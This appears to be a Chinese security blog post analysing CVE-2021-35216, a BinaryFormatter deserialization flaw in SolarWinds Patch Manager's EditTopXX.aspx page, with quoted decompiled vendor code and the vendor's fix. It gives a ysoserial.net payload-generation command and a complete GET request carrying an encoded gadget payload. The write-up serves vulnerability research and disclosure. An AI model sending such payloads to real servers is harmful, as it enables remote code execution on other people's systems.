
CVE-2021-35216 SolarWinds PM EditTopXX.aspx RCE

source link: https://y4er.com/post/cve-2021-35216-solarwinds-patch-manager-edittopxx-rce/

CVE-2021-35216 SolarWinds PM EditTopXX.aspx RCE

2021-10-23 代码审计 CVE SolarWinds

同样是使用了Serializer.Deserialize<T>(string serializedObject)

漏洞位于 SolarWinds\Orion\PM\Controls\EditResourceControls\EditTopXX.aspx.cs

1.png

同样调用 binaryformatter

2.png

ysoserial.net生成payload可以直接打,需要注意只能用get请求发包,所以要用最小的payload。

ysoserial.exe -f binaryformatter -g  RolePrincipal --minify -c "ping localhost -t"
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
using System.Text;
using System.Web;
using System.Web.Mvc;

namespace WebApplication1.Controllers
{
    public class HomeController : Controller
    {
        /// <summary>
        /// Writes a URL-token-encoded copy of a fixed string to the response and then renders the default view.
        /// The string literal is redacted in this listing; only the encoding steps are shown.
        /// </summary>
        public ActionResult Index()
        {
            const string input = "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";
            // UTF-8 bytes of the text, then ASP.NET's URL-safe base64 variant —
            // the same outer layer that Base64Helper.Base64Encode applies.
            byte[] raw = Encoding.UTF8.GetBytes(input);
            string encoded = HttpServerUtility.UrlTokenEncode(raw);
            Response.Write(encoded);
            return View();
        }
    }

    public class Serializer
    {
        // Decompiled vendor code quoted as evidence; the Token/RID/RVA lines are the decompiler's, not the author's.
        // Wire format: BinaryFormatter bytes -> Base64Helper.Base64Encode (standard base64, then URL-token base64).

        // Token: 0x06000295 RID: 661 RVA: 0x0000B64C File Offset: 0x0000984C
        /// <summary>
        /// Serializes <paramref name="parameters"/> with <see cref="BinaryFormatter"/> into a memory stream and
        /// returns the bytes encoded by <see cref="Base64Helper.Base64Encode"/>.
        /// </summary>
        /// <param name="parameters">Object graph to serialize; must be marked serializable for BinaryFormatter.</param>
        /// <returns>The encoded serialized graph.</returns>
        public static string Serialize(object parameters)
        {
            string result;
            using (MemoryStream memoryStream = new MemoryStream())
            {
                new BinaryFormatter().Serialize(memoryStream, parameters);
                result = Base64Helper.Base64Encode(memoryStream.ToArray());
            }

            return result;
        }

        // Token: 0x06000295 RID: 661 RVA: 0x0000B7E8 File Offset: 0x000099E8
        /// <summary>
        /// Decodes <paramref name="serializedObject"/> with <see cref="Base64Helper.Base64Decode"/>, deserializes
        /// it with <see cref="BinaryFormatter"/>, and casts the result to <typeparamref name="T"/>.
        /// </summary>
        /// <remarks>
        /// SECURITY: this is the CVE-2021-35216 sink. BinaryFormatter.Deserialize instantiates whatever types the
        /// input names before the cast to <typeparamref name="T"/> runs, so the cast is not a mitigation; any caller
        /// that passes externally supplied data (per the article, EditTopXX.aspx passes the ThwackData query
        /// parameter here) hands the sender arbitrary code execution. No type binder or allow-list is applied.
        /// The vendor fix described in the article replaced BinaryFormatter with DataContractSerializer restricted
        /// to known types; current .NET versions disable or remove BinaryFormatter outright.
        /// </remarks>
        /// <param name="serializedObject">Encoded payload produced by <see cref="Serialize"/>.</param>
        /// <returns>The deserialized object cast to <typeparamref name="T"/>.</returns>
        public static T Deserialize<T>(string serializedObject)
        {
            T result;
            using (Stream stream = new MemoryStream(Base64Helper.Base64Decode(serializedObject)))
            {
                // Deserialization (and any attacker-controlled type construction) happens before the cast.
                result = (T) ((object) new BinaryFormatter().Deserialize(stream));
            }

            return result;
        }
    }

    internal class Base64Helper
    {
        // Token: 0x060002AC RID: 684 RVA: 0x0000C819 File Offset: 0x0000AA19
        /// <summary>
        /// Encodes <paramref name="str"/> twice: standard base64 first, then the UTF-8 bytes of that text as an
        /// ASP.NET URL token (the URL-safe base64 variant produced by <see cref="HttpServerUtility.UrlTokenEncode"/>).
        /// </summary>
        /// <param name="str">Raw bytes to encode.</param>
        /// <returns>The double-encoded text.</returns>
        public static string Base64Encode(byte[] str)
        {
            string standard = Convert.ToBase64String(str);
            byte[] textBytes = Encoding.UTF8.GetBytes(standard);
            return HttpServerUtility.UrlTokenEncode(textBytes);
        }

        // Token: 0x060002AD RID: 685 RVA: 0x0000C830 File Offset: 0x0000AA30
        /// <summary>
        /// Reverses <see cref="Base64Encode"/>: URL-token decode, read the bytes as UTF-8, then standard base64 decode.
        /// Input is not validated here; malformed text surfaces as an exception from one of the decode stages.
        /// </summary>
        /// <param name="str">Text produced by <see cref="Base64Encode"/>.</param>
        /// <returns>The original bytes.</returns>
        public static byte[] Base64Decode(string str)
        {
            byte[] tokenBytes = HttpServerUtility.UrlTokenDecode(str);
            string standard = Encoding.UTF8.GetString(tokenBytes);
            return Convert.FromBase64String(standard);
        }
    }
}

构造请求如下

http://192.168.137.130:8787/Orion/PM/Controls/EditResourceControls/EditTopXX.aspx?ThwackData=QUFFQUFBRC8vLy8vQVFBQUFBQUFBQUFNQWdBQUFFcFRlWE4wWlcwdVYyVmlMRlpsY25OcGIyNDlOQzR3TGpBdU1DeERkV3gwZFhKbFBXNWxkWFJ5WVd3c1VIVmliR2xqUzJWNVZHOXJaVzQ5WWpBelpqVm1OMll4TVdRMU1HRXpZUVVCQUFBQUlWTjVjM1JsYlM1WFpXSXVVMlZqZFhKcGRIa3VVbTlzWlZCeWFXNWphWEJoYkFFQUFBQXFVM2x6ZEdWdExsTmxZM1Z5YVhSNUxrTnNZV2x0YzFCeWFXNWphWEJoYkM1SlpHVnVkR2wwYVdWekFRSUFBQUFHQXdBQUFOZ0ZRVUZGUVVGQlJDOHZMeTh2UVZGQlFVRkJRVUZCUVVGTlFXZEJRVUZDZEU1aFYwNTVZak5PZGxwdVVYVlZSemt6V2xoS1ZHRkhWbk5pUXpWR1drZHNNR0l6U1VaQlVVRkJRVVZLVG1GWFRubGlNMDUyV201UmRWWnRiSHBrVjBaelZUTlNNVnBIYkhaTWJGSnNaVWhSZFZKdE9YbGlWMFl3WkVkc2RWcDVOVlZhV0dnd1VtMDVlV0pYUmpCa1IyeDFXakZLTVdKc1FubGlNMEpzWTI1U2NGcFlUVUpCUVVGQlJEQmFkbU50Vm01amJUa3hZbTFTUTJOdVZucGhRVVZEUVVGQlFVSm5UVUZCUVVOSVFYcDRVRmx0Y0d4Wk0xSkZXVmhTYUZWSVNuWmtiV3hyV2xoSloxUlhWakJoUnpsclZHMUdkRnBVTUdsVk0xSm9ZMjVSYVVsSWFIUmlSelY2VUZOS2IyUklVbmRQYVRoMll6Sk9iMXBYTVdoamVUVjBZVmRPZVdJelRuWmFibEYxV1RJNWRFd3paSEJpYlZvMFRIcEpkMDFFV1habFIwWjBZa001ZDJOdFZucGFWelV3V1ZoU2NHSXlOR2xKU0doMFlrYzFlazl0UlRsSmJVNXpZMmt4ZFZsWE1XeGpNMEpvV1RKVk5sVXpiSHBrUjFaMFRHdFNjRmxYWkhWaU0wNHdZVmRPZWs4eVJucGpNbFowV1cxNE5WQldUalZqTTFKc1lsTkpLMUJGT1dsaGJWWnFaRVZTYUdSSFJsRmpiVGt5WVZkU2JHTnBOVkJaYlhCc1dUTlNTbUp1VGpCWlZ6VnFXbFEwT0ZsVWNGRmpiVGxxV2xoT2VsQnFlR2hQYkVKNVlqSk9iR016VFhWVk0xSm9ZMjVTU21KdFduWlFhbmhvVDJ4Q2VXSXlUbXhqTTA1VVpFZEdlV1JGYkhWYWJUaG5VVmhLYm1SWE1XeGlibEo2VUZOSmRsbDVRbmRoVnpWdVNVZDRkbGt5Um5OaFJ6bDZaRU5CZEdSRFNXZFNiV3h6V2xVMWFHSlhWVGxKYlU1MFdrTkpkbEJxZDNaWlZIQlJZMjA1YWxwWVRucE1iRTR3V1ZoS01GTlhOVzFpZWpRNFRESkZObFZJU25aWk1sWjZZM28wT0V3d09XbGhiVlpxWkVWU2FHUkhSbEZqYlRreVlWZFNiR05wTlZCWmJYQnNXVE5TU21KdVRqQlpWelZxV2xRME9Fd3dPV2xoYlZacVpFVlNhR1JIUmxGamJUa3lZVmRTYkdOcU5Fd0w1

3.png

问了@Jang,他说不记得具体是哪个CVE编号了,但这个洞也是他提交的,也是在35216到35218这一批中的。

4.png

改用DataContractSerializer处理序列化,并限定KnownTypes。

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。

